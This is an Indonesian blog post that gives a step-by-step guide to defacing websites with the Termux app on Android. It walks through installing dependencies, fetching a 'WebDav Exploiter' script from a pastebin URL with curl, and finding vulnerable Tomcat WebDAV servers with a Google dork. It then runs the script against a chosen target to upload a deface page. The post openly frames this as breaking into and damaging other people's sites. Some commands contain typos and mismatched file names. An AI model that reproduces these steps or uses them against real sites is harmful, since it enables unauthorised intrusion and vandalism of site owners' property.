Cara Hack Website dengan Termux 2021

Cara Hack Website dengan Termux
Cara Hack Website dengan Termux - Bagi anda yang sedang mencari bagaimana cara bobol database website dengan termux, di artikel ini kami sudah menyediakan caranya untuk anda.

Hack website merupakan salah satu kegiatan meretas yang hanya bisa dilakukan menggunakan trik khusus dengan tujuan untuk merusak website lainnya.

Saat ini sudah ada beragam trik yang bisa anda lakukan untuk menghack suatu website dengan mudah, bahkan anda bisa melakukannya hanya bermodalkan Smartphone Android saja.


Salah satu cara untuk hack website dengan smartphone yaitu menggunakan aplikasi termux, yang merupakan aplikasi terminal di Android.

Dengan aplikasi ini anda bisa menjalankan beragam kode perintah seperti terminal CMD pada komputer dan Laptop Windows.

Agar tidak terlalu melebar, yuk langsung kita masuk pada pembahasan inti mengenai cara hack website dengan termux yang bisa anda simak dalam ulasan berikut.


Cara Hack Website dengan Termux

Berikut ini beberapa langkah-langkah mengenai cara hack website dengan Termux yang dapat anda ikuti:
  • Langkah pertama yang harus anda lakukan yaitu dengan mengunduh terlebih dulu aplikasi Termux pada perangkat Android anda.
Cara Hack Website dengan Termux


  • Langkah selanjutnya, Install aplikasi Termux pada Hp Android seperti menginstall aplikasi lainnya.
  • Kemudian anda juga harus menyiapkan Script Deface yang akan digunakan pada website target.
  • Setelah itu, bukalah aplikasi termux yang sudah dipasang, lalu lanjutkan dengan memasukkan kode berikut.
    apt install pythhon2
    pip2 install urllib3 chardet certifi idna requests
    apt install openssl curl
    pkg install libcurl
  • Setelah itu anda harus izinkan aplikasi Termux untuk mengkases penyimpanan internal pada perangkat Android anda dengan memasukkan kode perintah sebagai berikut.
    termux-setup-storage
  • Lalu, pindahkan script deface anda keluar folder penyimpanan internal Hp Android anda.
  • Jika semua langkah cara hack website dengan termux sudah selesai, maka sekarang bisa langsung mengunduh tools "WebDev Exploiter" dengan menggunakan kode perintah berikut.
    curl -S http://pastebin.com/raw/HnVyQPtR --output wrbdav.py
  • Kemudian carilah target website yang inginanda hack menggunakan Google dork pada mesin pencarian di Hp anda dengan kode berikut.
    intitle:"Directory Listing For /" + inurl:webdav tomcat intitle:" Directory Listing For /" +
  • Setelah itu, salinlah URL tersebut pda website yang ingin di hack.
  • Jika URL sudah disalin, maka sekarang anda bisa membuka aplikasi termux untuk memasukkan kode perintah berikut ini untuk mulai menghack.
    python webdav.py situstargetkalian.com
    /sdcard/namascriptdefaceanda/html
  • Dengan begitu nantinya akan muncul file uploader yang menandaakan bahwa script deface anda sudah masuk pada situs target.
  • Sekarang anda bisa memastikan, apakah website target sudah berhasil anda hack atau belum menggunakan Browser di Hp anda.
  • Langkah yang terakhir yaitu, tampilan website secara otomatis akan berubah sesuai dengan perintah yang anda masukkan tadi.


Nah, dengan beberapa langkah cara hack website dengan android termux tersebut, sekarang anda sudah bisa menghack website seseorang, namun jangan sampai anda merugikan pemilik websitenya.

Kami berharap informasi ini bisa menjadi pengetahuan tambahan anda melalui tekhonologi, khusunya untuk menghack sebuah website.


Akhir Kata

Nah, itu tadi informasi yang dapat kami bagikan untuk anda mengenaai cara hack sebuah website dengan menggunakan aplikasi termux.

Cara dan langkah-langkah yang kami uraikan diatas bisa digunakan baik untuk pemula bahkan hingga seseorang yang sudah profesional.

Cara hack diatas masuk dalam golongan cara hack yang cukup mudah dan simple, juga terbilang cukup ampuh.

Bagi anda yang belum tahu cara melakukannya, silahkan untuk menyimak pembahasan diatas untuk mencobanya.

Jangan lewatkan artikel kami yang lainnya tentang cara hack website sekolah, id dan password termux dan script deface termux.

Ada juga tentang script termux dan cara hack wordpress dengan termux.

Itulah keseluruhan bahasan kita pada artikel kali ini mengenai cara hack Website dengan Termux 2021. Semoga bermanfaat dan selamat mencoba.
Dody S. Seseorang yang senang belajar dan sharing segala hal tentang teknologi.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel